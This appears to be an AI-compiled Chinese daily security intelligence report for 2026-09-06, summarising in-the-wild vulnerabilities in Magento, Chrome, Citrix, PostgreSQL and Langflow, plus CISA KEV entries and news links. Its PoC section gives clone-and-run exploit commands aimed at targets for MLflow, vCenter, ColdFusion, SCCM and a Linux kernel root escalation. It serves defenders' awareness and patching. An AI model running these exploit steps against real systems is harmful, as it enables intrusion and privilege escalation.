每日安全情报报告 · 2026-09-06

每日安全情报报告 · 2026-09-06

由 AI 整理发布

覆盖范围:2026-09-04 至 2026-09-06(优先收录近 24--48 小时新增/在野利用漏洞)

风险等级图例:【严重】(CVSS 9.0--10.0) | 【高危】(CVSS 7.0--8.9) | 【中危】(CVSS 4.0--6.9)

标记说明:在野利用 = 已确认被真实攻击使用(CISA KEV / 厂商/威胁情报证实)


一、最新高危漏洞

1. Magento / Adobe Commerce 零日 RCE「StyleSmuggler」【严重 · 在野利用】

  • 漏洞编号:CVE 待分配(零日)
  • 漏洞类型:模板系统代码注入 → 未授权远程代码执行(RCE)
  • 受影响组件:Magento Open Source 2.4.7 / 2.4.8 / 2.4.9 及 Adobe Commerce 全版本(含 2.4.9,截至 9/6 无补丁)
  • CVSS 评分:厂商未定级(影响面为「全版本接管」级别)
  • 利用状态 :自 2026-09-04 22:40 UTC 起遭在野利用,已出现持久化后门(伪装为内核线程 [kworker/u:8:0] 的 Rust 二进制 + 每 5 分钟重启的 cron)
  • 技术要点:攻击者向 Magento 模板系统注入恶意 PHP 代码(常借「支付失败报告」写入),随后通过触发「Payment Transaction Failed Reminder」邮件渲染阶段执行代码;无需打开邮件即可触发,邮件投递失败也可利用。
  • 缓解建议:部署 Sansec Shield 实时拦截;无 Shield 时临时禁用 GraphQL;运行 eComscan 检测植入。Adobe 下一次安全更新定于 2026-09-08(是否覆盖未知)。
  • 参考链接Sansec 官方公告The Hacker News 报道

2. CVE-2026-85046 --- Google Chrome V8 类型混淆零日【高危 · 在野利用】

  • 漏洞类型:类型混淆(Type Confusion,CWE-843)
  • 受影响组件:Google Chrome ≤ 152.0.7977.82(Windows/macOS/Linux),及其他基于 Chromium 的浏览器(Edge、Opera 等)
  • CVSS 评分:High(Chromium 官方评级;NVD 收录)
  • 利用状态:Google 已确认存在在野利用,为 2026 年第 6 个被利用的 Chrome 零日;攻击者可诱导受害者访问特制 HTML 页面,在浏览器沙箱内执行任意代码。
  • 修复版本:152.0.7977.82/.83
  • 参考链接CVE 记录(MITRE)NVD 详情Google Chrome 发布说明CUHK 安全警报

3. CVE-2026-19490 --- Citrix NetScaler 认证绕过【严重 · 在野利用】

  • 漏洞类型:认证绕过(CWE-288,Alternate Path)
  • 受影响组件:NetScaler ADC / Gateway 14.1 < 73.32、13.1 < 63.21 及对应 FIPS/NDcPP 版本(配置为 Gateway 或 AAA vserver 时触发)
  • CVSS 评分:9.3(CVSS v4.0)
  • 利用状态:2026-09-03 起遭在野攻击,已有「可信」PoC 公开;攻击源分布于澳大利亚、美国、德国。Shadowserver 统计约 22,000+ ADC 与近 1,700 Gateway 暴露公网。
  • 修复版本:14.1-73.32 / 13.1-63.21 及以上
  • 参考链接Citrix 官方安全公告NVD 详情BleepingComputer 报道HKCERT 分析

4. CVE-2026-6471 --- PostgreSQL「PostGREShell」超级用户提权【严重】

  • 漏洞类型:逻辑复制输出插件路径未校验 → RCE + 永久超级用户提权
  • 受影响组件:PostgreSQL 9.4 -- 18(自 2014 年引入逻辑解码即存在)
  • CVSS 评分:Critical(Cyera Research 披露)
  • 利用状态 :2026-09-05 由 Cyera Research 披露。持有 REPLICATION 属性的低权限账户可借逻辑复制实现 RCE 并提权至 superuser,通过修改 pg_hba.conf 与预加载库写入持久化后门,重启/手动回滚均无法清除。
  • 参考链接CyberSecBrief 每日简报(9/5)

5. CVE-2026-0768 --- Langflow 未授权 RCE【严重 · 在野利用】

  • 漏洞类型:代码校验器组件命令/代码注入 → 未授权 RCE(root 权限)
  • 受影响组件:Langflow ≤ 1.4.2(建议升级至 1.11.6)
  • CVSS 评分:Critical
  • 利用状态:VulnCheck 蜜罐自 2026-09-01 起观测到利用(最初约 50 次/周末,迅速升至 360+ 次,来源以俄罗斯为主),目标为窃取 AWS 密钥、OpenAI API Key、Langflow 管理员凭据等环境变量。
  • 参考链接zeroday.news 深度报道CISA KEV 目录

6. 其他重点新增漏洞

漏洞编号 类型 受影响组件 CVSS 风险 参考链接
CVE-2026-20212 内存处理缺陷 → 未授权 root RCE Cisco Nexus 9000(Silicon One 架构) 9.8 严重 The Hacker News
CVE-2026-73749 内存处理缺陷 → 未授权 RCE HPE ArubaOS-CX 严重 严重 BleepingComputer
CVE-2026-59346 VMXNET3 整数溢出 → 虚拟机逃逸 VMware Workstation / Fusion 25H2, 26H1 9.3 高危 FreeBuf 报道
CVE-2026-59347 HGFS 栈溢出 → 主机代码执行 VMware Workstation / Fusion 25H2, 26H1 8.1 高危 FreeBuf 报道
CVE-2026-33824 IKE 服务双释放 Microsoft Windows 9.8 严重 · 在野 CISA KEV
CVE-2026-65400 认证缺陷 Apple macOS 9.8 严重 · 在野 CISA KEV

7. CISA KEV 9/2 通报的 7 个在野利用漏洞速览

2026-09-02 CISA 一次性将 7 个确认遭在野利用的漏洞纳入 KEV 目录,含两个 CVSS 10.0 满分 RCE:

漏洞编号 类型 受影响组件 CVSS 利用情况
CVE-2026-83548 SSRF(未授权) SonicWall SMA 1000 10.0 在野,常与 CVE-2026-83549 链式 RCE
CVE-2026-49869 OS 命令注入 Kestra OSS 10.0 在野,建立反向 Shell / 挖矿 / 数据外泄
CVE-2026-82329 认证绕过 JFrog Artifactory 9.8 在野,伪造管理员令牌
CVE-2026-9586 SQL 注入 Sangoma Switchvox 9.3 在野,反弹 Shell
CVE-2026-83549 认证后命令注入 SonicWall SMA 1000 7.8 在野,链式 RCE
CVE-2026-59822 认证缺陷 Berri/LiteLLM 8.8 在野(Qilin 勒索),窃 AI 密钥
CVE-2026-48710 HTTP 请求走私 Kludex Starlette 6.5 在野(Qilin 勒索)

二、最新漏洞 PoC(含复现步骤)

说明:下列 PoC 均为近期公开仓库,仅供授权安全研究与渗透测试使用。对第一节中「在野利用」的零日(Magento StyleSmuggler、Chrome CVE-2026-85046、Citrix CVE-2026-19490、Langflow CVE-2026-0768、PostgreSQL CVE-2026-6471),截至 9/6 尚无公开可用 PoC 或细节受限,请优先以补丁/缓解措施为准。

1. CVE-2026-64849 --- MLflow SSRF(DNS 重绑定绕过)【高危】

方式二:Python PoC

git clone https://github.com/BiuTrap/CVE-2026-64849

cd CVE-2026-64849

pip install requests

python3 exploit.py http://target:5000

```

  • 前置条件 :目标为暴露公网的 MLflow 实例且启用 webhook 投递。缓解:升级 MLflow 至修复提交 ba949522

2. CVE-2026-59310 --- VMware vCenter Server 路径遍历【严重 · KEV 在野】

  • 受影响组件:VMware vCenter Server(Syslog 服务路径遍历,可任意文件读/写)
  • 公开 PoC
  • BiuTrap/CVE-2026-59310
  • HORKimhab/CVE-2026-59310
  • 复现步骤
    bash git clone https://github.com/BiuTrap/CVE-2026-59310 cd CVE-2026-59310 pip install requests python3 exploit.py http://target:443
  • 前置条件:网络可达的 vCenter 实例。已列入 CISA KEV,须优先修复。

3. CVE-2026-48282 --- Adobe ColdFusion 路径遍历 → RCE【严重】

  • 受影响组件:Adobe ColdFusion(RDS 组件路径遍历 → 任意文件写入 → RCE,未授权)
  • 公开 PoCimbas007/CVE-2026-48282
  • 复现步骤
    bash git clone https://github.com/imbas007/CVE-2026-48282 cd CVE-2026-48282 pip install requests python3 exploit.py http://target:8500
  • 前置条件:开放 RDS 服务的 ColdFusion 实例。缓解:应用 Adobe 安全公告补丁。

4. CVE-2026-47301 --- Microsoft SCCM 提权 RCE【高危】

  • 受影响组件:Microsoft Configuration Manager / SCCM(访问控制缺陷 → 域用户至企业级 SYSTEM)
  • 公开 PoComribaso/sccm-cve-2026-47301-remote-code-execution-exploit(漏洞发现者本人发布)
  • 复现步骤
    bash git clone https://github.com/omribaso/sccm-cve-2026-47301-remote-code-execution-exploit cd sccm-cve-2026-47301-remote-code-execution-exploit pip install -r requirements.txt python3 exploit.py --target <SCCM-Server> --domain <DOMAIN> --user <USER> --pass <PASS>
  • 前置条件:需合法低权限域账户。补丁:KB38232642。审计结论为「真 PoC,作者即发现者,代码无回调」。

5. CVE-2026-64531 --- Linux 内核 OVS 本地提权「OVSwrap」【高危】

  • 受影响组件:Linux 内核 Open vSwitch(OVS)模块 Netlink 隧道元数据边界检查缺失 → 堆溢出 → root 提权
  • 公开 PoCmanizada/OVSwrap
  • 复现步骤
    bash # 在测试虚拟机中以低权限用户运行 useradd -s /bin/bash -m pseudo echo 'pseudo:cat@md5' | chpasswd # 切换至 pseudo 后: git clone https://github.com/manizada/OVSwrap cd OVSwrap python3 ovswrap-poc.py # 成功后 pseudo 被加入 sudoers,执行 sudo -i 即可提权
  • ⚠️ 警告 :该 PoC 基于内存破坏,成功利用后内核不稳定,正常关机大概率卡死,仅可在快照虚拟机中操作 。缓解:升级含修复补丁的内核,或临时 echo "install openvswitch /bin/false" | sudo tee /etc/modprobe.d/disable-openvswitch.conf
  • 参考链接研究者技术博文NVD 详情

三、网络安全最新文章

  1. Magento 零日被命名为 StyleSmuggler,全版本在野利用、无补丁 --- Sansec 官方公告(9/5)
  2. Google 修复被在野利用的 Chrome V8 零日 CVE-2026-85046 --- Google Chrome ReleasesThe Hacker News 追踪(9/3--9/4)
  3. Citrix NetScaler 认证绕过 CVE-2026-19490 遭在野攻击,PoC 已公开 --- BleepingComputer(9/5)
  4. CISA 将 7 个在野利用漏洞纳入 KEV,含两个 10.0 满分 RCE --- CISA 官方通报安全圈/网易解读(9/3)
  5. Langflow 关键 RCE CVE-2026-0768 被利用窃取 OpenAI / AWS 密钥 --- zeroday.news(9/)
  6. PostgreSQL PostGREShell(CVE-2026-6471)自 2014 年起存在,低权账户可获永久超级用户 --- CyberSecBrief 每日简报(9/5)
  7. VMware Workstation / Fusion 虚拟机逃逸漏洞(VMSA-2026-0007) --- FreeBuf 报道(9/3)
  8. AI 安全专题周报(20260904):LiteLLM 漏洞遭在野利用、Hermes Agent 恶意 Git 配置 RCE --- 360 Netlab Blog(9/4)
  9. FreeBuf 早报:黑客利用 LiteLLM 管理 API 漏洞(CVE-2026-35029)窃取机密并攻击 AI 网关 --- FreeBuf(9/)
  10. Coder 软件供应链遭入侵,恶意 Terraform 模块专偷云与 AI 密钥 --- BleepingComputer(8/31)

部分内容由 AI 辅助生成

相关推荐
HackTwoHub7 小时前
BurpSuite2026.8专业(稳定版)下载Windows/Linux/Mac支持Java21以上(新增Burp AT智能体)
linux·运维·服务器·安全·macos·网络安全·自动化
Chockmans8 小时前
SRC---信息收集(灯塔自动化推荐)
网络安全
数据知道8 小时前
YARA 规则编写实战——从样本到检测规则
网络·安全·网络安全
Fnetlink110 小时前
Fnet 云网安 260907
网络·人工智能·安全·web安全·网络安全·智能路由器
学逆向的10 小时前
PE——合并节
开发语言·网络安全·pe
武汉唯众智创11 小时前
计算机网络综合实训室怎么建?2026版建设思路、云平台架构与课程体系深度拆解
网络安全·产教融合·职业教育·计算机网络综合实训室·实训室建设·网络系统建设与运维·网络实训室
锐速网络11 小时前
漏洞管理闭环:扫描、验证、渗透、修复全流程
网络安全·渗透测试·漏洞管理·漏洞修复·漏洞扫描·安全运维·虚拟补丁
上学的小垃圾12 小时前
华为eNSP防火墙USG6000V登录管理方式
网络·网络安全·华为
酿情师1 天前
【春秋云镜】CVE-2023-30212
安全威胁分析·cve